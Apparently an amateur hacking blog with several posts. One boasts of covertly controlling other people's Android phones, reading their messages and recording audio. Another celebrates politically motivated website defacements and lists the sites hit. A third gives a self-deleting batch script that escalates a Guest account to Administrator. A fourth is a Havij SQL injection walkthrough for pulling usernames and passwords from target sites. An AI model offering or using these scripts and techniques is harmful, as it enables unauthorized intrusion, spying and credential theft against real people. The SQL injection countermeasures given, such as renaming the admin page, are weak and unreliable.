Friday, January 10, 2014

ANDROID HACKING

HAI friends Today I HACKED ANDROID MOBILES more than 5 phones 
I CAN CONTROL ALL THESE OPTIONS 
Vibrate the phone







Send a message and voice message.

Find phone by making it ring.

Find phone using GPS location.

Remotely lock device.

Phone status: battery, imei, etc.

Wipe data.

Hide from launcher (Name : Service GPS).

Take picture with front camera.

Take picture with rear camera.

ist of SMS.

list of contacts.

list of calls.

Messages Facebook (Phone rooted only).
Messages WhatsApp (Phone rooted only).

Record audio with microphone.

Monday, January 6, 2014

Anti-Narendra Modi websites hacked and defaced




Narendra Modi, Gujarat Chief Minister and BJP's prime ministerial candidate has so many support from youngsters. It seems now he also gets support from hackers.

Few websites against Narendra Modi has been breached by hackers. The list of hacked websites:
  •  http://www.fekuexpress.com/
  • http://www.thekalyugtimes.com/
  • http://www.fekuneeds.com/ 
  • http://feku.me/
  • http://www.fekuonsale.com/
    The hackers defaced the home page with a picture of Narendra modi and a message saying "Narendra Modi Fan is here".

    "we are the person of him, nobody can rule on us)
    sun rises from the hopes everywhere
     intention are steely courage of everystep
     we are today going to write destiny by our hand
     MODIJI NEXT PM
    Narendra Modi Zindabad" The defacement reads(translated).

    Source : http://www.ehackingnews.com/2014/01/anti-narendra-modi-websites-hacked-and.html

    Monday, December 2, 2013

    Hack Administrator from Guest

    Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.



    echo off
    title Please wait...
    cls
    net user add Username Password /add
    net user localgroup Administrators Username /add
    net user Guest 420 /active:yes
    net localgroup Guests Guest /DELETE
    net localgroup Administrators Guest /add
    del %0




    Copy this to notepad and save the file as "Guest2admin.bat"
    then u can double click the file to execute or run in the cmd.
    it works...

    -----------------------------------------

    ADMINISTRATOR IN WELCOME SCREEN.


    When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
    First you must ensure that the Administrator Account is enabled:
    1 open Control Panel
    2 open Administrative Tools
    3 open Local Security Policy
    4 expand Local Policies
    5 click on Security Options
    6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
    1 open Control Panel
    2 open User Accounts
    3 click Change the way users log on or log off
    4 untick Use the Welcome Screen
    5 click Apply Options
    You will now be able to log on to Windows XP as Administrator in Normal Mode.



    EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


    Start the Registry Editor Go to:
    HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
    Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

    Enjoy

    SITE GOT HACKED BY CYBER-ROCK-HACKERS

    Friday, November 29, 2013

    Hack Websites Using Havij SQL Injection Tutorial

    According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

    One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.


    Supported Databases With Havij
    • MsSQL 2000/2005 with error.
    • MsSQL 2000/2005 no error union based
    • MySQL union based
    • MySQL Blind
    • MySQL error based
    • MySQL time based
    • Oracle union based
    • MsAccess union based
    • Sybase (ASE)


    Demonstration
    Now i will Show you step by step the process of SQL injection.
    Step1: Find 
    SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.
    Step3: Now click on the Analyse button as shown below.

    Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:

    Step4: Now click on the Tables button and then click Get Tables button from below column as shown below:


    Step5: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.

    Countermeasures: 

    Here are some of the countermeasures you can take to reduce the risk of SQL Injection
    1.      Renaming the admin page will make it difficult for a hacker to locate it
    2.      Use a Intrusion detection system and compose the signatures for popular SQL injection strings
    3.      One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.